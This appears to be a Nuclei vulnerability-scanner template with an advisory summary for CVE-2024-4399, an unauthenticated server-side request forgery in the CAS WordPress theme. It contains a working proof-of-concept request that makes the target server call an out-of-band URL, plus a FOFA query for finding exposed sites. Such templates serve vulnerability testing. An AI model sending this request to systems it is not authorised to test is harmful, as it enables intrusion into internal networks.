The CAS WordPress theme through version 1.0.0 is vulnerable to Server-Side Request Forgery (SSRF) via the 'url' parameter in the get_remote_data.php script. This vulnerability allows unauthenticated attackers to make the server perform requests to arbitrary URLs.
PoC代码[已公开]
id: CVE-2024-4399
info:
name: WordPress CAS Theme <= 1.0.0 - Server-Side Request Forgery
author: ritikchaddha
severity: critical
description: |
The CAS WordPress theme through version 1.0.0 is vulnerable to Server-Side Request Forgery (SSRF) via the 'url' parameter in the get_remote_data.php script. This vulnerability allows unauthenticated attackers to make the server perform requests to arbitrary URLs.
reference:
- https://wpscan.com/vulnerability/0690327e-da60-4d71-8b3c-ac9533d82302
- https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-4399
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-4399
cwe-id: CWE-918
epss-score: 0.24466
epss-percentile: 0.95924
metadata:
max-request: 2
product: cas
fofa-query: body="wp-content/themes/cas/"
tags: cve,cve2024,wp,wordpress,wp-theme,ssrf,cas,oast
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
part: body
words:
- "themes/cas"
internal: true
- raw:
- |
GET /wp-content/themes/cas/get_remote_data.php?url=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 4a0a00473045022100b1face5ec29867d9a773d8eb549d956636b1306386d65ecd7ef87cacd4494950022017c99f8914f0d0c756609b7e08ced4023942b2f056ace1e65a2056f83a850671:922c64590222798bb761d5b6d8e72950